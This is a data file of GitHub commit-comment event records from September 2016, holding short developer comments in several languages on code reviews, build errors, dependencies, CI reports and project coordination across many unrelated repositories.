{"id":"4514871190","type":"CommitCommentEvent","actor":{"login":"mdsmestad"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18895029,"position":null,"line":null,"path":null,"commit_id":"d2a20370f4cf63c2e79d6fa1975ebc9ace063f3e","created_at":"2016-09-05T02:48:20Z","updated_at":"2016-09-05T02:48:20Z","body":"Thanks for this tid bit, this has happened to me a few times and it's irritating!"}},"created_at":"2016-09-05T02:48:20Z"}
{"id":"4514874301","type":"CommitCommentEvent","actor":{"login":"industrialtechnology"},"repo":{"name":"industrialtechnology/PLCprogramming"},"payload":{"comment":{"id":18895039,"position":null,"line":null,"path":null,"commit_id":"e2dca4561a5a5cd3f2f016f45ae85541836ff753","created_at":"2016-09-05T02:49:57Z","updated_at":"2016-09-05T02:49:57Z","body":"The two basic approaches to the one rung solution anyway are indirect addressing for PLC programming, and Tags/Arrays for PAC programming.\r\n\r\n- [ ] Write logic, reference here."}},"created_at":"2016-09-05T02:49:57Z"}
{"id":"4514875352","type":"CommitCommentEvent","actor":{"login":"mars8022"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":18895042,"position":null,"line":null,"path":null,"commit_id":"209c058368cc669714e219d4366fc88135bea26f","created_at":"2016-09-05T02:50:30Z","updated_at":"2016-09-05T02:50:30Z","body":"still crash"}},"created_at":"2016-09-05T02:50:30Z"}
{"id":"4514877292","type":"CommitCommentEvent","actor":{"login":"lueimg"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895044,"position":15,"line":81,"path":"server.js","commit_id":"19bee22f237da4c2f333f55ff7b24233552b451c","created_at":"2016-09-05T02:51:40Z","updated_at":"2016-09-05T02:51:40Z","body":"@mvergaray I was thinking instead of create a previous variable , we can add the route path directly\r\napp.use('/Zones', require('./server/features/zonesService.js'));"}},"created_at":"2016-09-05T02:51:40Z"}
{"id":"4514877862","type":"CommitCommentEvent","actor":{"login":"lueimg"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895046,"position":15,"line":81,"path":"server.js","commit_id":"19bee22f237da4c2f333f55ff7b24233552b451c","created_at":"2016-09-05T02:52:00Z","updated_at":"2016-09-05T02:52:00Z","body":"@ISAMARC/owners will it send a mail ?"}},"created_at":"2016-09-05T02:52:00Z"}
{"id":"4514881923","type":"CommitCommentEvent","actor":{"login":"baoziguo"},"repo":{"name":"baoziguo/android-"},"payload":{"comment":{"id":18895051,"position":null,"line":null,"path":null,"commit_id":"d828386c6751503493e7980c2f31e05a1c8e43b8","created_at":"2016-09-05T02:54:14Z","updated_at":"2016-09-05T02:54:14Z","body":"[低版本实现共享元素动画](https://github.com/thinkSky1206/android-blog/blob/master/低版本实现共享元素动画.md)"}},"created_at":"2016-09-05T02:54:14Z"}
{"id":"4514883155","type":"CommitCommentEvent","actor":{"login":"lueimg"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895053,"position":15,"line":81,"path":"server.js","commit_id":"19bee22f237da4c2f333f55ff7b24233552b451c","created_at":"2016-09-05T02:54:54Z","updated_at":"2016-09-05T02:54:54Z","body":"@mvergaraybs @mvergaray let's try mails again :D"}},"created_at":"2016-09-05T02:54:54Z"}
{"id":"4514887078","type":"CommitCommentEvent","actor":{"login":"mvergaray"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895061,"position":15,"line":81,"path":"server.js","commit_id":"19bee22f237da4c2f333f55ff7b24233552b451c","created_at":"2016-09-05T02:56:57Z","updated_at":"2016-09-05T02:56:57Z","body":"Sounds good, please apply it to every route."}},"created_at":"2016-09-05T02:56:57Z"}
{"id":"4514889563","type":"CommitCommentEvent","actor":{"login":"lueimg"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895063,"position":16,"line":69,"path":"public/core/app.js","commit_id":"3a4258f90714837fc642c727940428fbabb0eb00","created_at":"2016-09-05T02:58:22Z","updated_at":"2016-09-05T02:58:22Z","body":"@mvergaray @mvergaraybs @ISAMARC/owners \r\nGeneric handler error for all resources \r\nwe only need to send from server the correct error status like 401, 500 , etc"}},"created_at":"2016-09-05T02:58:22Z"}
{"id":"4514890786","type":"CommitCommentEvent","actor":{"login":"pvaidos"},"repo":{"name":"pvaidos/pvaidos"},"payload":{"comment":{"id":18895064,"position":null,"line":null,"path":null,"commit_id":"2218180206b8cb81a96d69098583fa023610f193","created_at":"2016-09-05T02:59:04Z","updated_at":"2016-09-05T02:59:04Z","body":"ok"}},"created_at":"2016-09-05T02:59:04Z"}
{"id":"4514890913","type":"CommitCommentEvent","actor":{"login":"lueimg"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895066,"position":15,"line":20,"path":"public/features/zones/templates/mantZone.html","commit_id":"3a4258f90714837fc642c727940428fbabb0eb00","created_at":"2016-09-05T02:59:08Z","updated_at":"2016-09-05T02:59:08Z","body":"@ISAMARC/owners it valid is the the name has change , meanwhile it will be disabled"}},"created_at":"2016-09-05T02:59:08Z"}
{"id":"4518202411","type":"CommitCommentEvent","actor":{"login":"gasinvein"},"repo":{"name":"TelepathyQt/telepathy-morse"},"payload":{"comment":{"id":18903452,"position":null,"line":null,"path":null,"commit_id":"e7ebe32bb9e319d3f542fce756b43f45691218c1","created_at":"2016-09-05T20:01:13Z","updated_at":"2016-09-05T20:01:13Z","body":"Then I don't need to update to 0.9.8 for now, thx.\n"}},"created_at":"2016-09-05T20:01:13Z"}
{"id":"4518203400","type":"CommitCommentEvent","actor":{"login":"pat357"},"repo":{"name":"jb-alvarado/media-autobuild_suite"},"payload":{"comment":{"id":18903456,"position":null,"line":null,"path":null,"commit_id":"695804f1f5b0946852e956fc81a23ee643cb1748","created_at":"2016-09-05T20:01:40Z","updated_at":"2016-09-05T20:01:40Z","body":"```\r\nOK, I got the file  rst2pdf-0.93-py2-none-any.whl   from there, but how to continue from here to get it installed using my MSYS Python2 ?\r\nI found other existing *.whl packages under \\usr\\lib\\python2.7\\ensurepip\\_bundled\\pip-7.1.2-py2.py3-none-any.whl and setuptools-18.2-py2.py3-none-any.whl.\r\n\r\nI think I need these other, but I've no idea how."}},"created_at":"2016-09-05T20:01:40Z"}
{"id":"4518204407","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18903458,"position":null,"line":null,"path":null,"commit_id":"49da837d61bdc2988b83e298c8964cf55486ec16","created_at":"2016-09-05T20:02:11Z","updated_at":"2016-09-05T20:02:11Z","body":"@vangheem Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/34/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:20:1: F401 'json' imported but unused\nplone/tiles/data.py:66:14: P002 found \"hasattr\", consider replacing it\nplone/tiles/data.py:111:12: P002 found \"hasattr\", consider replacing it\nplone/tiles/data.py:153:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:201:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:282:1: C901 'decode' is too complex (14)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-05T20:02:11Z"}
{"id":"4518211714","type":"CommitCommentEvent","actor":{"login":"amirhossein1381"},"repo":{"name":"amirhossein1381/amirhossein"},"payload":{"comment":{"id":18903475,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-05T20:05:41Z","updated_at":"2016-09-05T20:05:41Z","body":"219066588\r\n"}},"created_at":"2016-09-05T20:05:41Z"}
{"id":"4518212127","type":"CommitCommentEvent","actor":{"login":"Safort"},"repo":{"name":"Safort/cards"},"payload":{"comment":{"id":18903477,"position":1,"line":1,"path":"src/js/components/ui/index.js","commit_id":"eddbb7be1c0a4d558eb7d83ea23c2e92e84a4214","created_at":"2016-09-05T20:05:53Z","updated_at":"2016-09-05T20:05:53Z","body":"Видимо, забыл ключ --save."}},"created_at":"2016-09-05T20:05:53Z"}
{"id":"4518217026","type":"CommitCommentEvent","actor":{"login":"plumpudding"},"repo":{"name":"moonlightly/android_device_xiaomi_gemini-1"},"payload":{"comment":{"id":18903483,"position":null,"line":null,"path":null,"commit_id":"69addd345cc063d3e977ede874ce957d7ad1c188","created_at":"2016-09-05T20:08:15Z","updated_at":"2016-09-05T20:08:15Z","body":"@h2o64 does this actually work?"}},"created_at":"2016-09-05T20:08:15Z"}
{"id":"4518217187","type":"CommitCommentEvent","actor":{"login":"Arthmoor"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18903484,"position":104,"line":127,"path":"Mopy/bash/game/fallout4/constants.py","commit_id":"63e43096b032765deb15f5520710c80159f0e140","created_at":"2016-09-05T20:08:18Z","updated_at":"2016-09-05T20:08:18Z","body":"The way I've always understood the reason for these file lists is that it's\na list of things the game places when installed. Since the game no longer\ndoes this there is no legitimate reason to keep the string files in the\nlist. Just because someone may come along and extract the contents doesn't\nmean we should leave them there any more than we would if someone extracted\nthe mesh file contents.\n\nOn Mon, Sep 5, 2016 at 8:41 AM, Sharlikran <notifications@github.com> wrote:\n\n> Any minor tweaks I have made would be in https://github.com/Sharlikran/\n> wrye-bash/tree/utumno-lo-rc3. I don't have time to comment on them or\n> rebase any commits but feel free to browse if you wish.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/wrye-bash/wrye-bash/commit/63e43096b032765deb15f5520710c80159f0e140#commitcomment-18901769>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABrlXIFxmS0lOQ4NjmqzaxqvG1AOR75Jks5qnDhFgaJpZM4Jxh5O>\n> .\n>\n"}},"created_at":"2016-09-05T20:08:18Z"}
{"id":"4518219597","type":"CommitCommentEvent","actor":{"login":"shinzangetsu"},"repo":{"name":"PLMCSIT/LexiCom"},"payload":{"comment":{"id":18903489,"position":null,"line":null,"path":null,"commit_id":"1325dcbe3a99fda0852888cba68bd2081600156c","created_at":"2016-09-05T20:09:29Z","updated_at":"2016-09-05T20:09:29Z","body":"Additional notes:\r\n   -The \"For Transitional Diagram.pptx\" and \"For Transtional Diagram.vsdx\" files may now be removed.\r\n   -The document \"Transitional Diagram.docx\" which consists the Transitional Diagram screen shots is not updated."}},"created_at":"2016-09-05T20:09:29Z"}
{"id":"4518220344","type":"CommitCommentEvent","actor":{"login":"frankmayer"},"repo":{"name":"arangodb/arangodb-php"},"payload":{"comment":{"id":18903491,"position":47,"line":47,"path":"CHANGELOG","commit_id":"8aca9a25e1b676f64f7790a16650f88b22c2ab50","created_at":"2016-09-05T20:09:51Z","updated_at":"2016-09-05T20:09:51Z","body":"Batch functionality is valuable for mass working with documents. In my opinion it should be there. I immediately missed it while getting my feet wet again, after a long hiatus, with Arango.\r\nIMHO it should definitely be there."}},"created_at":"2016-09-05T20:09:51Z"}
{"id":"4518222855","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18903493,"position":null,"line":null,"path":null,"commit_id":"8aa3d1ee4c5d2263c4b5015e868e3b6b0d7e8488","created_at":"2016-09-05T20:11:01Z","updated_at":"2016-09-05T20:11:01Z","body":"I just wanted to keep the debug log short"}},"created_at":"2016-09-05T20:11:01Z"}
{"id":"4518223658","type":"CommitCommentEvent","actor":{"login":"Edwinnar"},"repo":{"name":"Edwinnar/Edwinnarvaez.github.io"},"payload":{"comment":{"id":18903494,"position":null,"line":null,"path":null,"commit_id":"93ee22ad9c27e40c611b2aa32d65776d473c8863","created_at":"2016-09-05T20:11:25Z","updated_at":"2016-09-05T20:11:25Z","body":"sasdasd"}},"created_at":"2016-09-05T20:11:25Z"}
{"id":"4518224063","type":"CommitCommentEvent","actor":{"login":"joshmiller83"},"repo":{"name":"drupalcommerce/commerce"},"payload":{"comment":{"id":18903495,"position":null,"line":null,"path":null,"commit_id":"5f9997ab77fc1994ea42440b902c77b0b2b481c4","created_at":"2016-09-05T20:11:36Z","updated_at":"2016-09-05T20:11:36Z","body":"💯 "}},"created_at":"2016-09-05T20:11:36Z"}
{"id":"4518227095","type":"CommitCommentEvent","actor":{"login":"chaochinyang"},"repo":{"name":"pencil-code/pencil-code"},"payload":{"comment":{"id":18903501,"position":null,"line":null,"path":null,"commit_id":"4ae46c3337926fb4c1ba4d0d911b0d0cc8d10851","created_at":"2016-09-05T20:13:03Z","updated_at":"2016-09-05T20:13:03Z","body":"My same comment on commit 4c67282 also applies here..."}},"created_at":"2016-09-05T20:13:03Z"}
{"id":"4518232710","type":"CommitCommentEvent","actor":{"login":"shinzangetsu"},"repo":{"name":"PLMCSIT/LexiCom"},"payload":{"comment":{"id":18903514,"position":null,"line":null,"path":null,"commit_id":"9d79a5d84f065f6b8206f46044d8bc96f8a333a1","created_at":"2016-09-05T20:15:39Z","updated_at":"2016-09-05T20:15:39Z","body":"TD Document Updated (refer to issue #14)"}},"created_at":"2016-09-05T20:15:39Z"}
{"id":"4518234725","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18903515,"position":106,"line":106,"path":"index.html","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-05T20:16:36Z","updated_at":"2016-09-05T20:16:36Z","body":"Кажется, тут напрашивается `<label>`"}},"created_at":"2016-09-05T20:16:36Z"}
{"id":"4518236074","type":"CommitCommentEvent","actor":{"login":"ymgn"},"repo":{"name":"oic-dotconnect/oic-dotconnect"},"payload":{"comment":{"id":18903517,"position":null,"line":null,"path":null,"commit_id":"ae35b86b76cbe9d31cd60018f658a4dbe36ba974","created_at":"2016-09-05T20:17:18Z","updated_at":"2016-09-05T20:17:18Z","body":"#20 #21 \r\n修正しました"}},"created_at":"2016-09-05T20:17:18Z"}
{"id":"4518237325","type":"CommitCommentEvent","actor":{"login":"mitchdowney"},"repo":{"name":"podverse/podverse-web"},"payload":{"comment":{"id":18903520,"position":11,"line":54,"path":"src/services/clip/ClipService.js","commit_id":"8cac8d1e70e97c229b604f617a5168dca71bbddb","created_at":"2016-09-05T20:17:55Z","updated_at":"2016-09-05T20:17:55Z","body":"Nice. What are some benefits of moving to a PostgresSQL db?"}},"created_at":"2016-09-05T20:17:55Z"}
{"id":"4518239658","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":18903523,"position":null,"line":null,"path":null,"commit_id":"5893d97a00f0353229abde474c350395aea0f3d3","created_at":"2016-09-05T20:18:57Z","updated_at":"2016-09-05T20:18:57Z","body":"Good.  Then commit your changes and push them again."}},"created_at":"2016-09-05T20:18:57Z"}
{"id":"4518245084","type":"CommitCommentEvent","actor":{"login":"mmaday"},"repo":{"name":"mdrjr/c2_bootini"},"payload":{"comment":{"id":18903533,"position":null,"line":null,"path":null,"commit_id":"40615b7aed69707455579a897e25e9c10e32f282","created_at":"2016-09-05T20:21:34Z","updated_at":"2016-09-05T20:21:34Z","body":"This test doesn't work with debian dash.  \r\n`/etc/initramfs-tools/scripts/local-top/c2_init.sh: 15: /etc/initramfs-tools/scripts/local-top/c2_init.sh: [[: not found`\r\nThe single `[` should be sufficient for this basic test and will solve this."}},"created_at":"2016-09-05T20:21:34Z"}
{"id":"4518251608","type":"CommitCommentEvent","actor":{"login":"DaSchTour"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":18903538,"position":null,"line":null,"path":null,"commit_id":"c0b9d3807f87528fab304c4e73679c4e60dc4689","created_at":"2016-09-05T20:24:51Z","updated_at":"2016-09-05T20:24:51Z","body":"What about changing them to peerDependencies?"}},"created_at":"2016-09-05T20:24:51Z"}
{"id":"4518255095","type":"CommitCommentEvent","actor":{"login":"gustavoghioldi"},"repo":{"name":"gustavoghioldi/tutoriales"},"payload":{"comment":{"id":18903545,"position":null,"line":null,"path":null,"commit_id":"e72539be9d9d53903cb6f6a64e1744007128503a","created_at":"2016-09-05T20:26:25Z","updated_at":"2016-09-05T20:26:25Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;NIbKJAQ4&#x2F;2-poner-la-tv-en-la-habitacion\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Poner la TV en la habitación</a>"}},"created_at":"2016-09-05T20:26:25Z"}
{"id":"4518256494","type":"CommitCommentEvent","actor":{"login":"svip"},"repo":{"name":"dikurevy/dikurevy.dk"},"payload":{"comment":{"id":18903551,"position":null,"line":null,"path":null,"commit_id":"1ed5fa03984751ea9488022a8a9bc103bdacb49c","created_at":"2016-09-05T20:27:04Z","updated_at":"2016-09-05T20:27:04Z","body":"Suggestions:\r\n\r\n* Simply write `.dropdown:hover ul {}` and drop the `id` from the `li`.\r\n* Further down in the file, remove JavaScript inclusions of `ajax.googleapis.com` and the bootstrap JavaScript, as neither are no longer necessary."}},"created_at":"2016-09-05T20:27:04Z"}
{"id":"4518256933","type":"CommitCommentEvent","actor":{"login":"mucamaca"},"repo":{"name":"mucamaca/gravity_connect"},"payload":{"comment":{"id":18903552,"position":null,"line":null,"path":null,"commit_id":"1967f5ecd366cbef712541ff8e06bc178400ee19","created_at":"2016-09-05T20:27:16Z","updated_at":"2016-09-05T20:27:16Z","body":"to je nice ja.\n\n\nOn 05. 09. 2016 20:59, jakobzmrzlikar wrote:\n>\n> ja sej sm vidu ja, nism vedu da lahko direkt na githubu release delas\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/mucamaca/gravity_connect/commit/1967f5ecd366cbef712541ff8e06bc178400ee19#commitcomment-18903121>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AO7w9Y7SRHEjgmIZ6xfqX2YE1qfbjaqJks5qnGaHgaJpZM4J1OYC>.\n>\n\n"}},"created_at":"2016-09-05T20:27:16Z"}
{"id":"4518258381","type":"CommitCommentEvent","actor":{"login":"gustavoghioldi"},"repo":{"name":"gustavoghioldi/tutoriales"},"payload":{"comment":{"id":18903557,"position":null,"line":null,"path":null,"commit_id":"e72539be9d9d53903cb6f6a64e1744007128503a","created_at":"2016-09-05T20:27:55Z","updated_at":"2016-09-05T20:27:55Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;NIbKJAQ4&#x2F;2-poner-la-tv-en-la-habitacion\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Poner la TV en la habitación</a>"}},"created_at":"2016-09-05T20:27:55Z"}
{"id":"4518258395","type":"CommitCommentEvent","actor":{"login":"gustavoghioldi"},"repo":{"name":"gustavoghioldi/tutoriales"},"payload":{"comment":{"id":18903558,"position":null,"line":null,"path":null,"commit_id":"e72539be9d9d53903cb6f6a64e1744007128503a","created_at":"2016-09-05T20:27:56Z","updated_at":"2016-09-05T20:27:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;NIbKJAQ4&#x2F;2-poner-la-tv-en-la-habitacion\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Poner la TV en la habitación</a>"}},"created_at":"2016-09-05T20:27:56Z"}
{"id":"4518260194","type":"CommitCommentEvent","actor":{"login":"StefH"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":18903560,"position":null,"line":null,"path":null,"commit_id":"c0b9d3807f87528fab304c4e73679c4e60dc4689","created_at":"2016-09-05T20:28:49Z","updated_at":"2016-09-05T20:28:49Z","body":"When I read this https://docs.npmjs.com/files/package.json#peerdependencies, I'm not sure this is the way to go ?\r\n\r\n///\r\nIn some cases, you want to express the compatibility of your package with a host tool or library, while not necessarily doing a require of this host. This is usually referred to as a plugin. Notably, your module may be exposing a specific interface, expected and specified by the host documentation.\r\n\r\nFor example:\r\n```json\r\n{\r\n  \"name\": \"tea-latte\",\r\n  \"version\": \"1.3.5\",\r\n  \"peerDependencies\": {\r\n    \"tea\": \"2.x\"\r\n  }\r\n}\r\n```\r\n\r\nThis ensures your package tea-latte can be installed along with the second major version of the host package tea only. npm install tea-latte could possibly yield the following dependency graph:\r\n\r\n```\r\n├── tea-latte@1.3.5\r\n└── tea@2.2.0\r\n```\r\n\r\nNOTE: npm versions 1 and 2 will automatically install peerDependencies if they are not explicitly depended upon higher in the dependency tree. In the next major version of npm (npm@3), this will no longer be the case. You will receive a warning that the peerDependency is not installed instead. The behavior in npms 1 & 2 was frequently confusing and could easily put you into dependency hell, a situation that npm is designed to avoid as much as possible.\r\n\r\nTrying to install another plugin with a conflicting requirement will cause an error. For this reason, make sure your plugin requirement is as broad as possible, and not to lock it down to specific patch versions.\r\n\r\nAssuming the host complies with semver, only changes in the host package's major version will break your plugin. Thus, if you've worked with every 1.x version of the host package, use \"^1.0\" or \"1.x\" to express this. If you depend on features introduced in 1.5.2, use \">= 1.5.2 < 2\"."}},"created_at":"2016-09-05T20:28:49Z"}
{"id":"4518261108","type":"CommitCommentEvent","actor":{"login":"merlino3d"},"repo":{"name":"8amLab/8amLib"},"payload":{"comment":{"id":18903561,"position":12,"line":1357,"path":"Deadline/Repository/submission/Houdini/Main/SubmitHoudiniToDeadline.py","commit_id":"bb1806498d19097788bc3d74ef85e3b5dc4e52d2","created_at":"2016-09-05T20:29:14Z","updated_at":"2016-09-05T20:29:14Z","body":"en lugar de \"and ...\" podría ser un elif"}},"created_at":"2016-09-05T20:29:14Z"}
{"id":"4518262494","type":"CommitCommentEvent","actor":{"login":"bitboxer"},"repo":{"name":"bitcrowd/tickety-tick"},"payload":{"comment":{"id":18903564,"position":null,"line":null,"path":null,"commit_id":"b946a091e634a19cdda3ddd519e0f015a3ddfdae","created_at":"2016-09-05T20:29:56Z","updated_at":"2016-09-05T20:29:56Z","body":"Can't wait to have this merged in 👍 ❤️ "}},"created_at":"2016-09-05T20:29:56Z"}
{"id":"4518263608","type":"CommitCommentEvent","actor":{"login":"matz-e"},"repo":{"name":"matz-e/lobster"},"payload":{"comment":{"id":18903568,"position":null,"line":null,"path":null,"commit_id":"b935d029f5a1aae3db2dba26668390ae1f18fec4","created_at":"2016-09-05T20:30:26Z","updated_at":"2016-09-05T20:30:26Z","body":"Thank you!"}},"created_at":"2016-09-05T20:30:26Z"}
{"id":"4518266336","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18903572,"position":null,"line":null,"path":null,"commit_id":"e5ee30e4b07d23410940c1dd5471536f48427084","created_at":"2016-09-05T20:31:40Z","updated_at":"2016-09-05T20:31:40Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cYTBYtqUSPm862vJki9V2A"}},"created_at":"2016-09-05T20:31:40Z"}
{"id":"4518270407","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18903574,"position":null,"line":null,"path":null,"commit_id":"903dd6e6d237aa91bff6100ed30c184433664e67","created_at":"2016-09-05T20:33:34Z","updated_at":"2016-09-05T20:33:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#WSXz-3DdQcKUQOKsYL0j_Q"}},"created_at":"2016-09-05T20:33:34Z"}
{"id":"4518272026","type":"CommitCommentEvent","actor":{"login":"LiquitoX"},"repo":{"name":"LiquitoX/PingTestApp"},"payload":{"comment":{"id":18903578,"position":14,"line":26,"path":"PingApp/PingApp/Form1.cs","commit_id":"eb90fede988262a5858eeb782347872287c24641","created_at":"2016-09-05T20:34:22Z","updated_at":"2016-09-05T20:34:22Z","body":"Reset to private."}},"created_at":"2016-09-05T20:34:22Z"}
{"id":"4518272295","type":"CommitCommentEvent","actor":{"login":"bryanlandia"},"repo":{"name":"appsembler/configuration"},"payload":{"comment":{"id":18903579,"position":null,"line":null,"path":null,"commit_id":"94733160f48df2f732748eb601309b5cfb27d69e","created_at":"2016-09-05T20:34:29Z","updated_at":"2016-09-05T20:34:29Z","body":"@bezidejni - The SCORM role now includes Nginx templates and a `copy` task which copies them into `playbooks/roles/nginx/templates/edx/app/nginx/sites-available` (Ansible `template` command won't look outside of the role for templates so they have to be copied there).  I cherry-picked a few other commits from `appsembler/master` which add `include.... ignore if missing` lines to the default Nginx conf templates for lms, cms, static-files, and lms-preview.  The SCORM role only needs includes for `lms.j2` and `static-files.j2`.  \r\n\r\nThose commits are:\r\nd6a75e247e914dc54e3d67705748d0d70c165759\r\n72710fbe1e25c3b93cdc2e046c21d7052a8cb34b\r\n174007d47ba1e72f2a76dcc852b68dfbf587b8ae\r\n\r\nThe SCORM role should now be run before the Nginx role so that the included files are in place.   I haven't made any edits to the configuration repo to change that order.  \r\n\r\nOn other sites I have re-run the Nginx role to pick up these changes, with a command like:\r\n```\r\nsudo /edx/app/edx_ansible/venvs/edx_ansible/bin/ansible-playbook -i localhost, -c local /edx/app/edx_ansible/edx_ansible/playbooks/run_role.yml -e\"role=nginx\"  -e\"@/edx/app/edx_ansible/edx_ansible/playbooks/roles/edxapp/defaults/main.yml\" -e\"@/edx/app/edx_ansible/server-vars.yml\" -e'{\"nginx_sites\":[\"lms\", “cms\"]}' -e'{\"nginx_default_sites\": [\"lms\"]}' -t install:configuration -vvv\r\n```\r\n\r\nIt would be smart to get the Nginx confs re-written using the SCORM/Nginx roles rather than keeping the ones manually edited.  \r\n\r\n@bezidejni Could you look into how we can make sure future updates to Academy will run these roles?\r\n\r\ncc @denibertovic @natea "}},"created_at":"2016-09-05T20:34:29Z"}
{"id":"4518272882","type":"CommitCommentEvent","actor":{"login":"kcdtv"},"repo":{"name":"t6x/reaver-wps-fork-t6x"},"payload":{"comment":{"id":18903581,"position":null,"line":null,"path":null,"commit_id":"2a564bfd44cdeef2e826ee27f6d5ee4afd822b38","created_at":"2016-09-05T20:34:46Z","updated_at":"2016-09-05T20:34:46Z","body":"this patches are not the one the fix the warning when compiling... we have to revert the changes and introduce the correct patches"}},"created_at":"2016-09-05T20:34:46Z"}
{"id":"4518275629","type":"CommitCommentEvent","actor":{"login":"joerick"},"repo":{"name":"tingbot/tide-electron"},"payload":{"comment":{"id":18903586,"position":null,"line":null,"path":null,"commit_id":"7e682bdcb05bed0bd8f7714b54b2df533f49b1e8","created_at":"2016-09-05T20:36:07Z","updated_at":"2016-09-05T20:36:07Z","body":"Thanks for this, Rob. This one is causing an error on Mac (and I'd guess Linux, too), since on those platforms the arguments don't get interpreted by a shell before they're passed to a program -- tbtool looks for an app path containing the literal `\\\"`bits"}},"created_at":"2016-09-05T20:36:07Z"}
{"id":"4518277793","type":"CommitCommentEvent","actor":{"login":"bidahor13"},"repo":{"name":"bidahor13/JSP_Projects"},"payload":{"comment":{"id":18903589,"position":null,"line":null,"path":null,"commit_id":"42b8e72e145f00db813035923e7cfc0e850f62b9","created_at":"2016-09-05T20:37:08Z","updated_at":"2016-09-05T20:37:08Z","body":"All bugs removed."}},"created_at":"2016-09-05T20:37:08Z"}
{"id":"4518282343","type":"CommitCommentEvent","actor":{"login":"artizani"},"repo":{"name":"artizani/Genesis-Audio"},"payload":{"comment":{"id":18903599,"position":null,"line":null,"path":null,"commit_id":"8d67459ac18363dc481e3c2bbf9c734bdc9dfca0","created_at":"2016-09-05T20:39:15Z","updated_at":"2016-09-05T20:39:15Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;S0qayZPp&#x2F;4-attach-commits-to-trello\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> attach commits to Trello</a>"}},"created_at":"2016-09-05T20:39:15Z"}
{"id":"4518283703","type":"CommitCommentEvent","actor":{"login":"joerick"},"repo":{"name":"tingbot/tide-electron"},"payload":{"comment":{"id":18903606,"position":null,"line":null,"path":null,"commit_id":"7e682bdcb05bed0bd8f7714b54b2df533f49b1e8","created_at":"2016-09-05T20:39:56Z","updated_at":"2016-09-05T20:39:56Z","body":"Maybe we scope with a `if (process.platform === 'win32') {...`?\r\n\r\nAlso I'd be in favour of moving to the TingProcess class, as I think this is a limitation with how pty.js is handling the arguments\r\n"}},"created_at":"2016-09-05T20:39:56Z"}
{"id":"4518286830","type":"CommitCommentEvent","actor":{"login":"tmlopus96"},"repo":{"name":"ZachPhillipsGary/Wooster-Github-Demo"},"payload":{"comment":{"id":18903612,"position":null,"line":null,"path":null,"commit_id":"323ce52e9b9e245d7bd7c0fd495c34c579b696e2","created_at":"2016-09-05T20:41:24Z","updated_at":"2016-09-05T20:41:24Z","body":"Omg what a cool commit!"}},"created_at":"2016-09-05T20:41:24Z"}
{"id":"4518287431","type":"CommitCommentEvent","actor":{"login":"alexrichert"},"repo":{"name":"pencil-code/pencil-code"},"payload":{"comment":{"id":18903613,"position":null,"line":null,"path":null,"commit_id":"4c672822c4895f16eb3b4431ef85144ce4f6e810","created_at":"2016-09-05T20:41:42Z","updated_at":"2016-09-05T20:41:42Z","body":"Thanks Chao-Chin, I now realize I didn't understand the whole MPVAR/MPAUX/etc. scheme very well. Anyway, I've fixed both of the commits you pointed out, and I think there may be one other similar fix that I need to make.\r\nAlex"}},"created_at":"2016-09-05T20:41:42Z"}
